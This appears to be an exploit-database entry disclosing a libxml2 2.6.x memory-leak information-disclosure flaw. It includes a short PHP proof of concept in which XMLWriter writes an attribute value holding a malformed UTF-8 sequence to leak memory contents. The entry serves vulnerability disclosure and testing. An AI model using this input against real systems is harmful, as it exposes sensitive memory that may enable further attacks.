libxml2 2.6.x - 'XMLWriter::writeAttribute()' Memory Leak Information Disclosure

Author: Kees Cook
type: remote
platform: multiple
port: 
date_added: 2011-01-24 
date_updated: 2014-11-16 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/45973/info

The 'libxml2' library is prone to a local information-disclosure vulnerability.

Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.

<?php
# Copyright 2010, Canonical, Ltd.
# Author: Kees Cook <kees@ubuntu.com>
# License: GPLv3
#
# Proof-of-concept memory content leak

$xw = new XMLWriter();
$xw->openURI('php://output');

$xw->startElement('input');
$xw->writeAttribute('value', "\xe0\x81");
$xw->endElement();

?>